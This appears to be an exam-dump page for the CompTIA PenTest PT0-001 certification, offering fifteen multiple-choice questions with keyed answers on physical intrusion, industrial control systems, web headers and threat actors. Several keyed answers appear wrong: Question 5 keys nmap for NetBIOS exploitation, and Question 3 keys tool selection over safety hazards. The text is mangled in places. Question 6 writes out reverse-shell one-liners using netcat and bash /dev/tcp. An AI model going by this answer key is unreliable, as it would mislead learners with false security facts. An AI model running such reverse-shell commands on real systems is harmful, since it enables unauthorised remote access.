Tens of thousands of competitors, pages of hard questions and unsatisfied exam preparation situations… Do not worried about all those annoying things! We, help you with your CompTIA PenTest Apr 07,2022 Latest PT0-001 pdf dumps CompTIA PenTest Exam exam. We will assist you clear the Newest PT0-001 free download exam with CompTIA PenTest PT0-001 vce. We PT0-001 dumps are the most comprehensive ones.

We Geekcert has our own expert team. They selected and published the latest PT0-001 preparation materials from Official Exam-Center.

The following are the PT0-001 free dumps. Go through and check the validity and accuracy of our PT0-001 dumps.Free sample questions of PT0-001 free dumps are provided here. All the following questions are from the latest real PT0-001 dumps.

Question 1:

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

A. Lockpicking

B. Egress sensor triggering

C. Lock bumping

D. Lock bypass

Correct Answer: D

Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test- examples/

Question 2:

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A. ICS vendors are slow to implement adequate security controls.

B. ICS staff are not adequately trained to perform basic duties.

C. There is a scarcity of replacement equipment for critical devices.

D. There is a lack of compliance for ICS facilities.

Correct Answer: B

Question 3:

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A. Selection of the appropriate set of security testing tools

B. Current and load ratings of the ICS components

C. Potential operational and safety hazards

D. Electrical certification of hardware used in the test

Correct Answer: A

Question 4:

Which of the following types of physical security attacks does a mantrap mitigate-?

A. Lock picking

B. Impersonation

C. Shoulder surfing

D. Tailgating

Correct Answer: D

Question 5:

A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

A. arPspoof

B. nmap

C. responder

D. burpsuite

Correct Answer: B

Reference: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/

Question 6:

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

A. perl -e ` use SOCKET\’; $i=\’; $p=\’443;

B. ssh [email protected] -p 443

C. nc -e /bin/sh 443

D. bash -i >and /dev/tcp// 443 0>and1

Correct Answer: D

Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd

Question 7:

A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

A. Obsolete software may contain exploitable components

B. Weak password management practices may be employed

C. Cryptographically weak protocols may be intercepted

D. Web server configurations may reveal sensitive information

Correct Answer: D

Question 8:

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened?

A. The biometric device is tuned more toward false positives

B. The biometric device is configured more toward true negatives

C. The biometric device is set to fail closed

D. The biometnc device duplicated a valid user\’s fingerpnnt.

Correct Answer: A

Question 9:

A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

A. Use path modification to escape the application\’s framework.

B. Create a frame that overlays the application.

C. Inject a malicious iframe containing JavaScript.

D. Pass an iframe attribute that is malicious.

Correct Answer: C

Question 10:

A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

A. Insider threat

B. Nation state

C. Script kiddie

D. Cybercrime organization.

Correct Answer: A

Question 11:

A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

A. Advanced persistent threat

B. Script kiddie

C. Hacktivist

D. Organized crime

Correct Answer: B

Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee

Question 12:

Which of the following are MOST important when planning for an engagement? (Select TWO).

A. Goals/objectives

B. Architectural diagrams

C. Tolerance to impact

D. Storage time for a report

E. Company policies

Correct Answer: AC

Question 13:

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A. Sample SOAP messages

B. The REST API documentation

C. A protocol fuzzing utility

D. An applicable XSD file

Correct Answer: D

Question 14:

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A. Command injection attack

B. Clickjacking attack

C. Directory traversal attack

D. Remote file inclusion attack

Correct Answer: B

References: https://geekflare.com/http-header-implementation/

Question 15:

A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?

A. Exploit chaining

B. Session hijacking

C. Dictionary

D. Karma

Correct Answer: C

Recommended Posts